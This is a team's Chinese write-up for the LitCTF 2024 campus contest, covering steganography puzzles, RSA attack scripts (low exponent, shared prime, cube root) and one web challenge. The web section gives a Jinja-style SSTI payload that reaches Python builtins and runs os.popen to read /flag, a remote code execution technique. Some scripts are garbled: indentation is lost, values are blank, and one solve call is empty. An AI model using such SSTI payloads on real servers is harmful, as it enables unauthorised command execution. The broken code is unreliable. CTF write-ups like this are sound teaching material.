Litctf2024-郑州轻工业大学第二届ctf-校内赛道wp
战队:怎落笔都不对最终成绩校内第4
https://files.mdnice.com/user/81572/6acecc12-5b89-451a-84fe-132dd586e7f1.png
MISC
1. 盯帧珍珠
打开文件发现是一个图片,放入 010 查看得文件头是 gif 格式
https://files.mdnice.com/user/81572/ddd4489e-c072-4a36-9184-331181779731.png
改为gif后缀得到一个GIF图,在下面这个网站分解,即可得到flag
https://33tool.com/gif_unzip/
2. 原铁,启动!
打开辟现是一个图片,里面是各种符号,根据标题描述去网上得到是原神和星穹铁道的语言符号如下
https://files.mdnice.com/user/81572/87f930c4-cac3-45d3-9176-a26171a30f2e.png
https://files.mdnice.com/user/81572/096e5dc7-3c6f-4b20-bf80-ee298eb31f00.png
对应起来就可以得到flag
3. 涐贪恋和伱、甾―⑺dé毎兮毎秒
根据标题提示应该是 lsb 隐写,用同流合污 ctf 编码工具利用文件及图片隐写可得到flag
https://files.mdnice.com/user/81572/bda616de-b0ad-4b5e-8a93-dc7ce514b7cb.png
4. 你说得对,但
打开是一个二维码,利用微信扫描是一个元神网页版游戏,思量大概是隐写,发现是一个jpg 图片,大概含有其他内容将其转换
https://files.mdnice.com/user/81572/2f98de65-d5f5-4bce-b6a1-0e8643b274be.png
用foremost 对其提取,得到四个分开的二维码
https://files.mdnice.com/user/81572/4732eb70-ba9e-48db-af98-95b4898d676f.png
利用工具合并他们,扫码得到flag
https://files.mdnice.com/user/81572/14badb77-2fb0-497d-b120-8a7583651f89.png
5. 舔到最后包罗万象
打开是一串编码,根据后面等号猜测是 base64,实验发现没有结果,试试base64 隐写,发现flag
https://files.mdnice.com/user/81572/4bb64caa-b36c-41d6-864b-ebf3be9462d9.png
6. 关键,太关键了!
根据标题提示以及两个文档,猜测大概是关键字密码,密钥应该在 key 里,通过标题提示发现字符频率,利用工具统计一下,结果如下
https://files.mdnice.com/user/81572/3b2cc85b-80e9-4c1c-8dc0-f7acf3ac4cd7.png
然后实验从b 开始一个一个试,最后得bingo 为其密钥,结果如下:
https://files.mdnice.com/user/81572/99e98fa2-3395-4b37-892c-2b94aaa2df68.png
根据标题把内容换成小写的就行
CRYPTO
1. CRT
打开文件是一个 e 很小的 rsa,大概是低加密指数攻击,而且 n,c分成 10 段,编写代码求解,如下
import libnum
import gmpy2
e=10
n =
c =
def exp(n, e, c):
for i in n:
for j in c:
k = 0
while 1:
m1 = k * i + j
m, t = gmpy2.iroot(m1, e)
if t:
#print(m)
print(libnum.n2s(int(m)).decode(),end="")
break
k += 1
exp(n, e, c)2. common_primes
分析代码发现公用一个e 和q,实验编写代码求解,结果如下:
import gmpy2
from Crypto.Util.number import *
n1 = 63306931765261881888912008095340470978772999620205174857271016152744820165330787864800482852578992473814976781143226630412780924144266471891939661312715157811674817013479316983665960087664430205713509995750877665395721635625035356901765881750073584848176491668327836527294900831898083545883834181689919776769
n2 = 73890412251808619164803968217212494551414786402702497903464017254263780569629065810640215252722102084753519255771619560056118922616964068426636691565703046691711267156442562144139650728482437040380743352597966331370286795249123105338283013032779352474246753386108510685224781299865560425114568893879804036573
c1 = 11273036722994861938281568979042367628277071611591846129102291159440871997302324919023708593105900105417528793646809809850626919594099479505740175853342947734943586940152981298688146019253712344529086852083823837309492466840942593843720630113494974454498664328412122979195932862028821524725158358036734514252
c2 = 42478690444030101869094906005321968598060849172551382502632480617775125215522908666432583017311390935937075283150967678500354031213909256982757457592610576392121713817693171520657833496635639026791597219755461854281419207606460025156812307819350960182028395013278964809309982264879773316952047848608898562420
e=65537
p=gmpy2.gcd(n1,n2)
q1=n1//p
q2=n2//p
phi_n1=(p-1)*(q1-1)
phi_n2=(p-1)*(q2-1)
d1=gmpy2.invert(e,phi_n1)
d2=gmpy2.invert(e,phi_n2)
m1=pow(c2,d2,n2)
print(long_to_bytes(m1).decode())
#m2=pow(c2,d1,n1)
#print(long_to_bytes(m2))结果如下:
https://files.mdnice.com/user/81572/822368e7-d306-42d3-a2b8-346c09ee4a27.png
3. small_e
打开代码,以知的有 e,n,c,而且c 被分开加密了,利用解题脚本实现
import libnum
import gmpy2
from Crypto.Util.number import *
n = 19041138093915757361446596917618836424321232810490087445558083446664894622882726613154205435993358657711781275735559409274819618824173042980556986038895407758062549819608054613307399838408867855623647751322414190174111523595370113664729594420259754806834656490417292174994337683676504327493103018506242963063671315605427867054873507720342850038307517016687659435974562024973531717274759193577450556292821410388268243304996720337394829726453680432751092955575512372582624694709289019402908986429709116441544332327738968785428501665254894444651547623008530708343210644814773933974042816703834571427534684321229977525229
e = 3
c =
def exp(n, e, c):
for i in c:
k = 0
while 1:
m1 = k * n + i
m, t = gmpy2.iroot(m1, e)
if t:
print(libnum.n2s(int(m)).decode(),end="")
break
k += 1
exp(n, e, c)结果如下:
https://files.mdnice.com/user/81572/3ae3c062-9a3c-4ad6-ab4c-f8b76e76cd2d.png
4. Polynomial
通过对代码的分析得知需要求解p,q,r 才能继续求解,利用代码实现方程求解:
import sympy
a = 58154360680755769340954893572401748667033313354117942223258370092578635555451803701875246040822675770820625484823955325325376503299610647282074512182673844099014723538935840345806279326671621834884174315042653272845859393720044076731894387316020043030549656441366838837625687203481896972821231596403741150142
b = 171692903673150731426296312524549271861303258108708311216496913475394189393793697817800098242049692305164782587880637516028827647505093628717337292578359337044168928317124830023051015272429945829345733688929892412065424786481363731277240073380880692592385413767327833405744609781605297684139130460468105300760
c = 97986346322515909710602796387982657630408165005623501811821116195049269186902123564611531712164389221482586560334051304898550068155631792198375385506099765648724724155022839470830188199666501947166597094066238209936082936786792764398576045555400742489416583987159603174056183635543796238419852007348207068832
p=sympy.symbols("p")
q=sympy.symbols("q")
r=sympy.symbols("r")
l=a-p**2-q
m=b-q**2-r
n=c-r**2-p
d=sympy.solve(,)
print(d)结果如下:
https://files.mdnice.com/user/81572/243e7446-2ce8-47ee-b37f-cbab9b3a365d.png
得到 p,q,r 后就可以用解题脚本来求解了
https://files.mdnice.com/user/81572/a04ce7f8-328b-4637-b88b-e617bf945103.png
Web
1. 一个池子
打开情况后发现需要在界面中键入有趣的内容进行下一步
https://files.mdnice.com/user/81572/0b9d6dca-e521-44a4-bcab-fd638bd3b754.png
一眼SSTI
pyload:
{{''. class . bases . subclasses (). init . globals [' b uiltins ']['eval'](' import ("os").popen("cat /flag").read()')}}结果:
https://files.mdnice.com/user/81572/accd3b3c-35cb-40f4-ab27-201618a56ecc.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]